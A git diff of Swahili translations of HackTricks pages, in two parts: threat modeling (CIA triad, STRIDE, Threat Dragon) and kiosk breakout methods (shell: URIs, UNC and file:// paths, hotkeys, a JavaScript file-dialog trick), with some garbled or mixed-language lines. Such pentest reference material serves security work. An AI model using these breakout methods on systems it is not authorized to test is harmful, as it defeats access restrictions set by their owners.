kwa rangi nyekundu, ikimaanisha udhaifu, hatari, au vizuizi. Ili kusonga mchakato wa kutambua hatari, triadi ya CIA (Usiri, Uadilifu, Upatikanaji) hutumiwa, ikifanya msingi wa mbinu nyingi za kufikiria tishio, na STRIDE ikiwa moja ya kawaida zaidi. Walakini, mbinu iliyochaguliwa inaweza kutofautiana kulingana na muktadha na mahitaji maalum. ### Triadi ya CIA -Triadi ya CIA ni mfano unaotambuliwa sana katika uwanja wa usalama wa habari, ikimaanisha Uwazi, Uadilifu, na Upatikanaji. Nguzo hizi tatu hujenga msingi ambao hatua nyingi za usalama na sera zinaundwa, pamoja na njia za uundaji wa mfano wa tishio. +Triadi ya CIA ni mfano unaotambuliwa sana katika uga wa usalama wa habari, ikimaanisha Usiri, Uadilifu, na Upatikanaji. Nguzo hizi tatu hufanya msingi ambao hatua nyingi za usalama na sera zinajengwa, pamoja na mbinu za kufikiria tishio. -1. **Uwazi**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasio na idhini. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine za kuzuia uvunjaji wa data. -2. **Uadilifu**: Uwiano, utulivu, na uaminifu wa data katika mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyo na idhini. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data. -3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walio na idhini wanapohitajika. Mara nyingi inahusisha redundancy, uvumilivu wa hitilafu, na usanidi wa upatikanaji wa juu ili kuendelea kuendesha mifumo hata katika uso wa vikwazo. +1. **Usiri**: Kuhakikisha kuwa data au mfumo haufikiwi na watu wasio na idhini. Hii ni sehemu muhimu ya usalama, inahitaji udhibiti sahihi wa ufikiaji, encryption, na hatua zingine kuzuia uvujaji wa data. +2. **Uadilifu**: Uwazi, uadilifu, na uaminifu wa data wakati wa mzunguko wake wa maisha. Kanuni hii inahakikisha kuwa data haijabadilishwa au kuharibiwa na vyama visivyo na idhini. Mara nyingi inahusisha checksums, hashing, na njia zingine za uthibitisho wa data. +3. **Upatikanaji**: Hii inahakikisha kuwa data na huduma zinapatikana kwa watumiaji walio na idhini wanapohitajika. Mara nyingi inahusisha redundancy, uvumilivu wa makosa, na miundo ya upatikanaji wa juu ili kuhakikisha mifumo inaendelea hata katika kipindi cha vurugu. -### Njia za Uundaji wa Mfano wa Tishio +### Mbinu za Kufikiria Tishio -1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupisho cha **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, na Elevation of Privilege**. Kila jamii inawakilisha aina ya tishio, na njia hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo ili kutambua tishio la uwezekano. -2. **DREAD**: Hii ni njia nyingine kutoka Microsoft inayotumiwa kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Damage potential, Reproducibility, Exploitability, Affected users, na Discoverability**. Kila moja ya sababu hizi hupewa alama, na matokeo hutumiwa kuweka kipaumbele kwa tishio lililotambuliwa. -3. **PASTA** (Mchakato wa Uigaji wa Shambulio na Uchambuzi wa Tishio): Hii ni njia ya hatua saba, **yenye msingi wa hatari**. Inajumuisha ufafanuzi na utambuzi wa malengo ya usalama, kuunda wigo wa kiufundi, uchambuzi wa tishio, uchambuzi wa udhaifu, na tathmini ya hatari / triage. -4. **Trike**: Hii ni njia inayolenga hatari ambayo inazingatia ulinzi wa mali. Inaanza kutoka kwa mtazamo wa **usimamizi wa hatari** na inachunguza tishio na udhaifu katika muktadha huo. -5. **VAST** (Uundaji wa Mfano Rahisi, wa Haraka, na wa Kuona): Njia hii inalenga kuwa rahisi zaidi na inaunganisha katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka njia zingine na inazingatia **taswira za kuona za tishio**. -6. **OCTAVE** (Uchambuzi wa Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushirikiano cha CERT, mfumo huu unalenga **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**. +1. **STRIDE**: Iliyoundwa na Microsoft, STRIDE ni kifupi cha **Kujifanya, Kuharibu, Kukataa, Kufichua Habari, Kukataa Huduma, na Kuinua Uwezo wa Haki**. Kila jamii inawakilisha aina ya tishio, na mbinu hii mara nyingi hutumiwa katika hatua ya kubuni ya programu au mfumo kutambua tishio la uwezekano. +2. **DREAD**: Hii ni mbinu nyingine kutoka Microsoft inayotumika kwa tathmini ya hatari ya tishio lililotambuliwa. DREAD inasimama kwa **Uharibifu wa Uwezo, Uwezekano wa Kurudia, Uwezekano wa Kutumia, Watumiaji Wanaoathiriwa, na Ugunduzi**. Kila moja ya sababu hizi hupewa alama, na matokeo hutumiwa kipaumbele tishio lililotambuliwa. +3. **PASTA** (Mchakato wa Ukweli wa Mashambulizi na Uchambuzi wa Tishio): Hii ni mbinu ya hatua saba, **yenye msingi wa hatari**. Inajumuisha kufafanua na kutambua malengo ya usalama, kuunda wigo wa kiufundi, uchambuzi wa tishio, uchambuzi wa udhaifu, na tathmini ya hatari/uchaguzi. +4. **Trike**: Hii ni mbinu inayolenga hatari ambayo inazingatia kulinda mali. Inaanza kutoka mtazamo wa **usimamizi wa hatari** na kutazama tishio na udhaifu katika muktadha huo. +5. **VAST** (Kufikiria Tishio kwa njia ya Visual, Agile, na Rahisi): Mbinu hii inalenga kuwa rahisi zaidi na inaingiliana katika mazingira ya maendeleo ya Agile. Inachanganya vipengele kutoka kwa mbinu zingine na inazingatia **uwakilishi wa visual wa tishio**. +6. **OCTAVE** (Tathmini ya Tishio, Mali, na Udhaifu wa Kazi): Iliyoundwa na Kituo cha Ushauri wa CERT, mfumo huu unalenga kwa **tathmini ya hatari ya shirika badala ya mifumo au programu maalum**. ## Zana @@ -38,11 +52,11 @@ Kuna zana na suluhisho za programu kadhaa zinazopatikana ambazo zinaweza **kusai ### [SpiderSuite](https://github.com/3nock/SpiderSuite) -Programu ya chui ya wavuti ya GUI ya msalaba ya juu na yenye vipengele vingi kwa wataalam wa usalama wa mtandao. Spider Suite inaweza kutumika kwa ajili ya kuchora na uchambuzi wa eneo la mashambulizi. +Kifaa cha msalaba cha juu cha jukwaa na GUI nyingi kwa wataalamu wa usalama wa mtandao. Spider Suite inaweza kutumika kwa ramani na uchambuzi wa eneo la shambulio. **Matumizi** -1. Chagua URL na Fanya Uchunguzi +1. Chagua URL na Tafuta
@@ -52,7 +66,7 @@ Programu ya chui ya wavuti ya GUI ya msalaba ya juu na yenye vipengele vingi kwa ### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases) -Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza mchoro wa mfumo pamoja na injini ya sheria ya kuzalisha tishio / kupunguza hatari. +Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na desktop ambayo inajumuisha kutengeneza mifumo pamoja na injini ya sheria ya kuzalisha moja kwa moja tishio/mitigations. **Matumizi** @@ -60,11 +74,11 @@ Mradi wa chanzo wazi kutoka OWASP, Threat Dragon ni programu ya wavuti na deskto
-Wakati mwingine inaweza kuonekana kama hii: +Wakati mwingine inaweza kuonekana kama hivi:
-2. Zindua Mradi Mpya +2. Anzisha Mradi Mpya
@@ -74,18 +88,50 @@ Wakati mwingine inaweza kuonekana kama hii: 4. Unda mfano wako -Unaweza kutumia zana kama SpiderSuite Crawler kukupa msukumo, mfano wa msingi ungekuwa kama hii +Unaweza kutumia zana kama SpiderSuite Crawler kukupa msukumo, mfano wa msingi ungeonekana kama hivi
-Kidogo tu ya maelezo kuhusu vitengo: +Kidogo kuhusu maelezo ya vitu: -* Mchakato (Kitengo yenyewe kama Seva ya Wavuti au utendaji wa wavuti) -* Mwigizaji (Mtu kama Mtembeleaji wa Tovuti, Mtumiaji, au Msimamizi) +* Mchakato (Entiti yenyewe kama Seva ya Wavuti au utendaji wa wavuti) +* Mwigizaji (Mtu kama Mtembeleaji wa Wavuti, Mtumiaji au Msimamizi) * Mstari wa Mzunguko wa Data (Kiashiria cha Mwingiliano) -* Mipaka ya Uaminifu (Sehemu tofauti za mtandao au wigo.) -* Uhifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases) +* Mpaka wa Uaminifu (Maeneo tofauti ya mtandao au mazingira.) +* Hifadhi (Vitu ambapo data zimehifadhiwa kama vile Databases) -5. Unda Tishio (Hatua ya 1) +5. Unda Tishio (Hatua 1) -Kwanza unapaswa kuchagua safu unayotaka kuong +Kwanza unapaswa kuchagua safu unayotaka kuongeza tishio + +
+ +Sasa unaweza kuunda tishio + +
+ +Kumbuka kuna tofauti kati ya Tishio la Mwigizaji na Tishio la Mchakato. Ikiwa ungeongeza tishio kwa Mwigizaji basi utaweza kuchagua "Kujifanya" na "Kukataa". Walakini katika mfano wetu tunaweka tishio kwa entiti ya Mchakato kwa hivyo tutapata hii katika sanduku la uundaji wa tishio: + +
+ +6. Maliza + +Sasa mfano wako uliomalizika unapaswa kuonekana kama hivi. Na hivi ndivyo unavyounda mfano rahisi wa tishio na OWASP Threat Dragon. + +
+### [Chombo cha Microsoft Threat Modeling](https://aka.ms/threatmodelingtool) + +Hii ni chombo cha bure kutoka Microsoft kinachosaidia katika kutambua vitisho katika hatua ya kubuni miradi ya programu. Hutumia mbinu ya STRIDE na ni hasa inafaa kwa wale wanaoendeleza kwenye mfumo wa Microsoft. + + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md index f97113632..a99f7e538 100644 --- a/hardware-physical-access/escaping-from-gui-applications.md +++ b/hardware-physical-access/escaping-from-gui-applications.md @@ -1,21 +1,34 @@
-Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) +* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa: + +{% embed url="https://whiteintel.io" %} + +--- # Angalia vitendo vinavyowezekana ndani ya programu ya GUI -**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kupata ufanisi wa Explorer ikiwa unaweza kupata chaguo hizi: +**Vidirisha vya Kawaida** ni chaguo kama **kuokoa faili**, **kufungua faili**, kuchagua font, rangi... Zaidi yao itakupa **ufanisi kamili wa Explorer**. Hii inamaanisha kuwa utaweza kufikia ufanisi wa Explorer ikiwa unaweza kufikia chaguo hizi: * Funga/Funga kama * Fungua/Fungua na @@ -33,7 +46,7 @@ Unapaswa kuangalia ikiwa unaweza: ## Utekelezaji wa Amri -Labda **kwa kutumia chaguo la `Fungua na`** unaweza kufungua/kutekeleza aina fulani ya shell. +Labda **ukitumia chaguo la `Fungua na`** unaweza kufungua/tekeleza aina fulani ya shell. ### Windows @@ -45,14 +58,14 @@ _bash, sh, zsh..._ Zaidi hapa: [https://gtfobins.github.io/](https://gtfobins.gi # Windows -## Kupitisha vizuizi vya njia +## Kupitisha vikwazo vya njia * **Mazingira ya mazingira**: Kuna mazingira mengi ya mazingira yanayoelekeza kwenye njia fulani * **Itifaki zingine**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_ * **Viungo vya ishara** * **Vidirisha vya mkato**: CTRL+N (fungua kikao kipya), CTRL+R (Tekeleza Amri), CTRL+SHIFT+ESC (Meneja wa Kazi), Windows+E (fungua explorer), CTRL-B, CTRL-I (Vipendwa), CTRL-H (Historia), CTRL-L, CTRL-O (Faili/Dirisha la Kufungua), CTRL-P (Dirisha la Kuchapisha), CTRL-S (Hifadhi Kama) * Menyu ya Utawala iliyofichwa: CTRL-ALT-F8, CTRL-ESC-F9 -* **URI za Shell**: _shell:Vyombo vya Utawala, shell:Thibitisho za Nyaraka, shell:Vifaa vya Maktaba, shell:Profaili za Mtumiaji, shell:Binafsi, shell:Dirisha la Nyumbani la Utafutaji, shell:Mfumo wa Utafutaji, shell:Mahali pa Mtandao, shell:Tuma Kwa, shell:Profaili za Watumiaji, shell:Vyombo vya Utawala vya Kawaida, shell:Dirisha langu la Kompyuta, shell:Dirisha la Mtandao_ +* **URIs za Shell**: _shell:Vyombo vya Utawala, shell:ThΖ° viện tΓ i liệu, shell:ThΖ° việnshell:Profiles za Watumiaji, shell:Binafsi, shell:Dirisha la Nyumbani la Utafutaji, shell:Mfumo wa Utafutaji, shell:Watumiaji, shell:Vyombo vya Utawala vya Kawaida, shell:KompyutaYangu, shell:Folder la Mtandao_ * **Njia za UNC**: Njia za kuunganisha folda zilizoshirikiwa. Jaribu kuunganisha C$ ya mashine ya ndani ("\\\127.0.0.1\c$\Windows\System32") * **Njia zaidi za UNC:** @@ -74,13 +87,13 @@ Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/pro Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/) -## Kupata mfumo wa faili kutoka kwenye kivinjari +## Kufikia mfumo wa faili kutoka kwenye kivinjari | NJIA | NJIA | NJIA | NJIA | | ------------------- | ----------------- | ------------------ | ------------------- | -| Faili:/C:/windows | Faili:/C:/windows/ | Faili:/C:/windows\\ | Faili:/C:\windows | -| Faili:/C:\windows\\ | Faili:/C:\windows/ | Faili://C:/windows | Faili://C:/windows/ | -| Faili://C:/windows\\ | Faili://C:\windows | Faili://C:\windows/ | Faili://C:\windows\\ | +| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows | +| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ | +| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ | | C:/windows | C:/windows/ | C:/windows\\ | C:\windows | | C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% | | %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% | @@ -88,20 +101,20 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour ## Vidirisha vya Mkato -* Viboreshaji vya Kitelezi – Bonyeza SHIFT mara 5 -* Viboreshaji vya Panya – SHIFT+ALT+NUMLOCK -* Mfano wa Juu – SHIFT+ALT+PRINTSCN -* Viboreshaji vya Toggle – Shikilia NUMLOCK kwa sekunde 5 -* Viboreshaji vya Kichujio – Shikilia SHIFT ya kulia kwa sekunde 12 +* Vitufe vya Sticky – Bonyeza SHIFT mara 5 +* Vitufe vya Panya – SHIFT+ALT+NUMLOCK +* Mfumo wa Juu – SHIFT+ALT+PRINTSCN +* Vitufe vya Toggle – Shikilia NUMLOCK kwa sekunde 5 +* Vitufe vya Kichujio – Shikilia SHIFT ya kulia kwa sekunde 12 * WINDOWS+F1 – Tafuta Windows -* WINDOWS+D – Onyesha Dakiika -* WINDOWS+E – Anzisha Windows Explorer +* WINDOWS+D – Onyesha Daki +* WINDOWS+E – Anzisha Explorer ya Windows * WINDOWS+R – Tekeleza * WINDOWS+U – Kituo cha Upatikanaji Rahisi * WINDOWS+F – Tafuta * SHIFT+F10 – Menyu ya Muktadha * CTRL+SHIFT+ESC – Meneja wa Kazi -* CTRL+ALT+DEL – Skrini ya Kufurahisha kwenye toleo jipya la Windows +* CTRL+ALT+DEL – Skrini ya kuingia kwenye toleo jipya la Windows * F1 – Msaada F3 – Tafuta * F6 – Mstari wa Anwani * F11 – Badilisha skrini nzima ndani ya Internet Explorer @@ -121,7 +134,7 @@ Mhariri wa Usajili: [https://sourceforge.net/projects/uberregedit/](https://sour ### 'Mwambaa wa Picha' -Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma kwa Barua, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer. +Ni mwambaa unaotokea juu-kushoto wa picha unapobonyeza. Utaweza Kuokoa, Kuchapisha, Kutuma Baruapepe, Kufungua "Picha Zangu" kwenye Explorer. Kiosk inahitaji kutumia Internet Explorer. ### Itifaki ya Shell @@ -132,19 +145,19 @@ Andika URL hizi kupata mtazamo wa Explorer: * `shell:Vifaa vya Maktaba` * `shell:Profaili za Mtumiaji` * `shell:Binafsi` -* `shell:Kutafuta Folda ya Nyumbani` -* `shell:Folda za Nafasi za Mtandao` +* `shell:Folderi ya Nyumbani ya Utafutaji` +* `shell:Folderi za Nafasi za Mtandao` * `shell:Tuma Kwa` * `shell:Profaili za Mtumiaji` * `shell:Vifaa vya Utawala wa Kawaida` -* `shell:Funga Kompyuta Yangu` -* `shell:Funga Mtandao` +* `shell:Folderi ya Kompyuta Yangu` +* `shell:Folderi ya Mtandao` * `Shell:Profaili` * `Shell:Faili za Programu` * `Shell:Mfumo` -* `Shell:Kisanduku cha Udhibiti` +* `Shell:Folderi ya Udhibiti wa Paneli` * `Shell:Windows` -* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Kisanduku cha Udhibiti +* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Udhibiti wa Paneli * `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Kompyuta Yangu * `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> Nafasi za Mtandao Yangu * `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer @@ -160,44 +173,44 @@ Backup toleo za iKat: [http://swin.es/k/](http://swin.es/k/)\ [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\ -Unda dialog ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('')` +Unda mazungumzo ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('')` Chanzo: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0 # iPad ## Miguso na Vitufe -* Piga juu na vidole vinne (au vitano) / Bonyeza mara mbili kitufe cha Nyumbani: Kuona mtazamo wa kazi nyingi na kubadilisha Programu +* Piga juu na vidole vinne (au vitano) / Bonyeza mara mbili kitufe cha Nyumbani: Kuona muonekano wa kazi nyingi na kubadilisha Programu * Piga upande mmoja au mwingine na vidole vinne au vitano: Ili kubadilisha kwa Programu inayofuata/ya mwisho * Kanda skrini na vidole vitano / Gusa kitufe cha Nyumbani / Piga juu na kidole 1 kutoka chini ya skrini kwa mwendo wa haraka kwenda juu: Kufikia Nyumbani -* Piga kidole kimoja kutoka chini ya skrini kwa umbali wa 1-2 inchi (polepole): Doki itaonekana +* Piga kidole 1 kutoka chini ya skrini kwa umbali wa 1-2 inchi (pole): Doki itaonekana * Piga chini kutoka juu ya skrini na kidole 1: Kuona arifa zako -* Piga chini na kidole 1 kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti cha iPad Pro +* Piga chini na kidole 1 kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti wa iPad Pro -* Piga kidole 1 kutoka kushoto mwa skrini 1-2 inchi: Kuona mtazamo wa Leo +* Piga kidole 1 kutoka kushoto mwa skrini 1-2 inchi: Kuona muonekano wa Leo * Piga haraka kidole 1 kutoka katikati mwa skrini kwenda kulia au kushoto: Kubadilisha kwa Programu inayofuata/ya mwisho -* Bonyeza na shikilia kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad +** Slide kuelekea kulia kabisa: Kuzima +* Bonyeza na shikilia kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad +** Slide kuelekea kulia kabisa kwa kuzima: Kuzima * Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani kwa sekunde chache**: Kufanya kuzima ngumu -* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani haraka**: Kupiga picha skrini ambayo itaonekana chini kushoto ya skrini. Bonyeza vitufe vyote kwa wakati mmoja kwa muda mfupi kama vile unavyowashikilia kwa sekunde kadhaa kuzima ngumu itafanyika. +* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani haraka**: Kuchukua picha ya skrini itakayotokea chini kushoto ya skrini. Bonyeza vitufe vyote kwa wakati mmoja kwa muda mfupi kama vile unavyowashikilia kwa sekunde kadhaa kufanya kuzima ngumu. ## Vielekezi -Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee ambavyo vinaweza kusaidia kutoroka kutoka kwa programu vitafunuliwa hapa. +Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee vinavyoweza kusaidia kutoroka kutoka kwa programu vitaonyeshwa hapa. | Kitufe | Jina | | --- | ------------ | | ⌘ | Amri | | βŒ₯ | Chaguo (Alt) | -| ⇧ | Geuza | +| ⇧ | Badilisha | | ↩ | Rudi | | β‡₯ | Tab | | ^ | Udhibiti | @@ -215,7 +228,7 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP | F1 | Punguza Skrini | | F2 | Ongeza mwangaza wa skrini | | F7 | Rudi nyimbo moja | -| F8 | Cheza/Acha | +| F8 | Cheza/Acha | | F9 | Ruka nyimbo | | F10 | Kimya | | F11 | Punguza sauti | @@ -227,27 +240,27 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP | Vielekezi | Hatua | | -------------------------------------------------- | ------------------------------------------------------- | | ⌘H | Nenda kwa Nyumbani | -| βŒ˜β‡§H (Amri-Geuza-H) | Nenda kwa Nyumbani | +| βŒ˜β‡§H (Amri-Shift-H) | Nenda kwa Nyumbani | | ⌘ (Space) | Fungua Spotlight | -| ⌘β‡₯ (Amri-Tab) | Orodhesha programu kumi zilizotumiwa mwisho | -| ⌘\~ | Nenda kwa Programu ya mwisho | -| βŒ˜β‡§3 (Amri-Geuza-3) | Piga picha skrini (inahamia chini kushoto kuhifadhi au kuchukua hatua) | -| βŒ˜β‡§4 | Piga picha skrini na ifungue kwenye mhariri | +| ⌘β‡₯ (Amri-Tab) | Onyesha programu kumi zilizotumiwa mwisho | +| ⌘\~ | Nenda kwa Programu iliyopita | +| βŒ˜β‡§3 (Amri-Shift-3) | Piga picha ya skrini (itajitokeza chini kushoto kuhifadhi au kuchukua hatua) | +| βŒ˜β‡§4 | Piga picha ya skrini na ifungue kwenye mhariri | | Bonyeza na shikilia ⌘ | Orodha ya vielekezi inapatikana kwa Programu | | ⌘βŒ₯D (Amri-Chaguo/Alt-D) | Lete doki | | ^βŒ₯H (Udhibiti-Chaguo-H) | Kitufe cha Nyumbani | | ^βŒ₯H H (Udhibiti-Chaguo-H-H) | Onyesha upau wa kazi nyingi | -| ^βŒ₯I (Udhibiti-Chaguo-i) | Chagua Kipengee | -| Kutoroka | Kitufe cha Nyuma | -| β†’ (Mshale wa Kulia) | Kipengee kifuatacho | +| ^βŒ₯I (Udhibiti-Chaguo-i) | Chagua kipengee | +| Kutoroka | Kitufe cha nyuma | +| β†’ (Mshale wa Kulia) | Kipengee kijacho | | ← (Mshale wa Kushoto) | Kipengee kilichopita | | ↑↓ (Mshale wa Juu, Mshale wa Chini) | Bonyeza kwa wakati mmoja kipengee kilichochaguliwa | | βŒ₯ ↓ (Chaguo-Mshale wa Chini) | Endesha chini | | βŒ₯↑ (Chaguo-Mshale wa Juu) | Endesha juu | -| βŒ₯← or βŒ₯β†’ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia | +| βŒ₯← au βŒ₯β†’ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia | | ^βŒ₯S (Udhibiti-Chaguo-S) | Wezesha au Lemaza Sauti ya VoiceOver | -| βŒ˜β‡§β‡₯ (Amri-Geuza-Tab) | Badilisha kwa programu iliyotangulia | -| ⌘β‡₯ (Amri-Tab) | Rudi kwa programu ya awali | +| βŒ˜β‡§β‡₯ (Amri-Shift-Tab) | Badilisha kwa programu iliyopita | +| ⌘β‡₯ (Amri-Tab) | Badilisha kurudi kwa programu ya awali | | ←+β†’, kisha Chaguo + ← au Chaguo+β†’ | Endesha kupitia Doki | ### Vielelezo vya Safari @@ -260,9 +273,9 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP | ⌘. | Acha kupakia kichupo cha sasa | | ^β‡₯ | Badilisha kwenye kichupo kijacho | | ^⇧β‡₯ (Kudhibiti-Shift-Tab) | Hamia kwenye kichupo kilichopita | -| ⌘L | Chagua kisanduku cha maandishi/eneo la URL ili ulibadilishe | +| ⌘L | Chagua kisanduku cha maandishi/URL kurekebisha | | βŒ˜β‡§T (Amri-Shift-T) | Fungua kichupo kilichofungwa mwisho (inaweza kutumika mara kadhaa) | -| ⌘\[ | Rudi nyuma ukurasa mmoja katika historia yako ya kutembelea | +| ⌘\[ | Nenda nyuma ukurasa mmoja katika historia yako ya kutembelea | | ⌘] | Nenda mbele ukurasa mmoja katika historia yako ya kutembelea | | βŒ˜β‡§R | Wezesha Mode ya Msomaji | @@ -285,9 +298,21 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP * [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: @@ -295,6 +320,6 @@ Njia nyingine za kusaidia HackTricks: * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
